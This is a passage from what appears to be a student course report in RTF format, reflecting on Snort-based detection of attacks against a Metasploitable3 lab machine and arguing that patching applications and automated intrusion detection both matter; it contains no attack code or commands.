\par \pard\plain \s0\nowidctlpar\hyphpar0\cf0\kerning1\dbch\af11\langfe2052\dbch\af11\afs24\alang1081\loch\f3\fs24\lang2057{\scaps0\caps0\cf19\expnd0\expndtw0\i0\b0\afs21\rtlch \ltrch\loch\fs21\loch\f9
The above contain at least minimum  detected 4 (required 3) and 5 (required 2) undetected attacks. I also tried a few others from the vulnerability list of Metasploitable3 but I won't include them all here due to readability and to save some words for the discussion about "Is it easier to fix the application than to detect attacks?"  The attack detection has multiple problems as discussed in the paper linked in the project description. Detecting attacks is very complicated and false positives create issues, and also attackers have multiple ways to cheat the detection systems: obfuscation, fragmentation etc. However applications are complex as well, and especially if using many third party libraries keeping track of vulnerabilities and keeping systems up to date is also very challenging. When using IDS systems, if they all are as complicated to configure as Snort, one really has to know what they are doing and it takes time and effort to do it properly. Fixing the application if problems are found is a must I would say, and using IDS will not mean that you would get away with sloppy design and not patching your systems. But IDS can be helpful with the huge amount of network traffic in complex systems and all the time increasingly complex attacks, especially if a corporation has no resources to spare for manual intrusion detection. This touches on the machine learning essay written earlier on this course, and future possibilities of using machine learning more in intrusion detection. I will keep to the opinion I had in that essay that automatic detection is a must with the huge amount of data to analyze, and the combination of analysts and supervised learning for machine intelligence seems like a good path for now.}
\par }